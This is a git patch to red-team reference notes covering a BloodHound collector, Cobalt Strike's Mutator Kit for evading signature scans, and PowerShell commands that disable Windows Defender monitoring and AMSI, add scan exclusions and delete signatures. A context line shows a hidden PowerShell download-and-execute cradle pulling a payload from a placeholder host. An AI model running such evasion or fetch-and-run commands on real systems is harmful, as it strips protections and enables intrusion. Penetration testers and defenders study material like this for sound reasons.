From 59791e0c9f7c6ca473a0f1e53325d05ffe7f524b Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 9 Feb 2024 15:03:09 +0100 Subject: [PATCH] Windows Defender Antivirus - DefenderCheck --- docs/active-directory/ad-adds-enumerate.md | 1 + docs/command-control/cobalt-strike.md | 19 ++++++++ docs/redteam/evasion/windows-defenses.md | 52 ++++++++++++++-------- 3 files changed, 54 insertions(+), 18 deletions(-) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 757aedc..f69c6f5 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -9,6 +9,7 @@ Use the correct collector: * [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS) * [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector) * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector) +* [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel) **Examples**: diff --git a/docs/command-control/cobalt-strike.md b/docs/command-control/cobalt-strike.md index e84435c..6c5aad8 100644 --- a/docs/command-control/cobalt-strike.md +++ b/docs/command-control/cobalt-strike.md @@ -13,6 +13,7 @@ $ ./cobaltstrike $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" ``` + ## Summary * [Infrastructure](#infrastructure) @@ -39,6 +40,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri * [Artifact Kit](#artifact-kit) * [Mimikatz Kit](#mimikatz-kit) * [Sleep Mask Kit](#sleep-mask-kit) + * [Mutator Kit](#mutator-kit) * [Thread Stack Spoofer](#thread-stack-spoofer) * [Beacon Object Files](#beacon-object-files) * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike) @@ -423,24 +425,40 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 : - Build the Artifact - Cobalt Strike -> Script Manager > Load .cna + ### Mimikatz Kit * Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e., 2.2.0.20210724) * Load the mimikatz.cna aggressor script * Use mimikatz functions as normal + ### Sleep Mask Kit > The Sleep Mask Kit is the source code for the sleep mask function that is executed to obfuscate Beacon, in memory, prior to sleeping. Use the included `build.sh` or `build.bat` script to build the Sleep Mask Kit on Kali Linux or Microsoft Windows. The script builds the sleep mask object file for the three types of Beacons (default, SMB, and TCP) on both x86 and x64 architectures in the sleepmask directory. The default type supports HTTP, HTTPS, and DNS Beacons. + +### Mutator Kit + +> The Mutator Kit, introduced by Cobalt Strike, is a tool designed to create uniquely mutated versions of a "sleep mask" used in payloads to evade detection by static signatures. It utilizes LLVM obfuscation techniques to alter the sleep mask, making it difficult for memory scanning tools to identify the mask based on predefined patterns, thereby enhancing operational security for red team activities. + +The OBFUSCATIONS variable can be `flattening`,`substitution`,`split-basic-blocks`,`bogus`. + +```ps1 +OBFUSCATIONS=substitution mutator.sh x64 -emit-llvm -S example.c -o example_with_substitutions.ll +mutator.sh x64 -c -DIMPL_CHKSTK_MS=1 -DMASK_TEXT_SECTION=1 -o sleepmask.x64.o src49/sleepmask.c +``` + + ### Thread Stack Spoofer > An advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. Thread Stack Spoofer is now enabled by default in the Artifact Kit, it is possible to disable it via the option `artifactkit_stack_spoof` in the config file `arsenal_kit.config`. + ## Beacon Object Files > A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs @@ -489,3 +507,4 @@ beacon> PortBender redirect 445 8445 * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) * [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf) +* [Introducing the Mutator Kit: Creating Object File Monstrosities with Sleep Mask and LLVM - @joehowwolf @HenriNurmi](https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm) \ No newline at end of file diff --git a/docs/redteam/evasion/windows-defenses.md b/docs/redteam/evasion/windows-defenses.md index 48667ea..736ea4d 100644 --- a/docs/redteam/evasion/windows-defenses.md +++ b/docs/redteam/evasion/windows-defenses.md @@ -321,29 +321,45 @@ Add-MpPreference -AttackSurfaceReductionRules_Ids -AttackSurfaceReductionRu Also known as `Microsoft Defender`. -```powershell -# check status of Defender -PS C:\> Get-MpComputerStatus +* Check status of Defender + ```powershell + PS C:\> Get-MpComputerStatus + ``` -# disable scanning all downloaded files and attachments, disable AMSI (reactive) -PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus -PS C:\> Set-MpPreference -DisableIOAVProtection $true +* Disable scanning all downloaded files and attachments + ```powershell + PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus + PS C:\> Set-MpPreference -DisableIOAVProtection $true + ``` -# disable AMSI (set to 0 to enable) -PS C:\> Set-MpPreference -DisableScriptScanning 1 +* Disable AMSI (set to 0 to enable) + ```powershell + PS C:\> Set-MpPreference -DisableScriptScanning 1 + ``` -# exclude a folder -PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" -PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" -PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" +* Exclude a folder, a process from scanning + ```powershell + PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" + PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" + PS C:\> Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" + ``` -# exclude using wmi -PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic" +* Exclude a folder using WMI + ```powershell + PS C:\> WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath="C:\Users\Public\wmic" + ``` + +* Remove signatures. **NOTE**: if Internet connection is present, they will be downloaded again. + ```powershell + PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All + PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All + ``` + +Identify the exact bytes that are detected by Windows Defender Antivirus + +* [matterpreter/DefenderCheck](https://github.com/matterpreter/DefenderCheck) - Identifies the bytes that Microsoft Defender flags on +* [gatariee/gocheck](https://github.com/gatariee/gocheck) - DefenderCheck but blazingly fastâ„¢ -# remove signatures (if Internet connection is present, they will be downloaded again): -PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All -PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -``` ## Windows Defender Application Control